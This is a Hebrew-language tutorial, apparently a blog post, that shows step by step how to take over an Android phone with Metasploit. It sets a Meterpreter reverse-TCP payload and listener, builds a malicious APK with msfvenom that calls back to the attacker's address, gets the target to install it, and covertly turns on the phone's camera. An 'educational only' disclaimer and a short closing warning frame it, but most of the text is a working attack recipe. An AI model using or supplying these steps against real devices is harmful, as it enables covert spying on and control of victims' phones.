* מטרת מדריך זה היא שימוש לימודי ולצורכי מחקר בלבד! כל שימוש אחר יהיה על אחריות המשתמש! (המכשיר שעליו בוצע המדריך הוא מכשיר לבדיקות אבטחה בלבד!)
* ראשית ניכנס אל Metasploit Framework בעזרת הפקודה הבאה:
* ראשית ניכנס אל Metasploit Framework בעזרת הפקודה הבאה:
> msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
* יש להיכנס אל handler ולטעון את ה-Payload הרצוי:
* טעינת Payload:
> set payload android/meterpreter/reverse_tcp
* הפקודת Show Options, תציג את הדרישות של אותו ה-Payload.
* במקרה הנ"ל יש להזין כתובת IP (מקומית) ומספר פורט מקומי מכיוון שהתהליך הוא Reverse-Shell.
* כעת יש להריץ ולהכניס למצב האזנה, המחשב שלנו יאזין עד שתגיע השיחה מהיעד.
ניתן להריץ באמצעות 2 פקודות זהות:
* run
* exploit
* כעת, כל שנותר הוא ליצור קובץ עם הפרטים הנדרשים ולהעבירו אל היעד. (msfvenom):
שימו לב היכן נשמר הקובץ, במקרה זה בחרתי שישמר בתיקייה הנוכחית בה אני נמצא.
msfvenom -p android/meterpreter/reverse_tcp lhost=172.16.0.3 lport=4444 R > name.apk
* לאחר פתיחת הקובץ, מזוהה כ-MainActivity מערכת ההפעלה תציג מספר אזהרות, נאשר ונמשיך הלאה.
* לאחר ההתחנה כל שנותר הוא ללחוץ על פתח, לאחר פתיחת הקובץ נקבל הודעה על תחילת שיחה עם היעד ויפתח Meterpreter:
* הפקודה help תציג רשימת פקודות שניתן לבצע, חלקן מופיעות בקישור הבא:
http://www.omegaton.com/2017/04/meterpreter.html
לסיום, כפי שניתן לראות בתמונה, במכשיר הסלולרי הכל מוצג כרגיל אך דרך המחשב הנייד פועלת המצלמה האחורית שלו.
* כך נראית המצלמה של מכשיר הגלקסי דרך דפדפן האינטרנט.
* כל התהליך לקח כ-10 דק', שימו לב!
אל תנסו זאת בבית שמע הדבר יכול לגרום נזק בלתי הפיך.
כמו כן יש להיזהר ולא לפתוח קבצים חשודים ולא להתקין קבצים הנשלחים במייל או הורדו מחוץ לחנות האפליקציות הרשמית של גוגל!
* בנוסף, ממליץ לכסות כל מצלמה פעילה: קדמית, אחורית וגם את זו של המחשב.
ידע זה כוח, נצלו אותו ובעזרתו שמרו על עצמכם ועל הסובבים אתכם למען סביבה בטוחה יותר!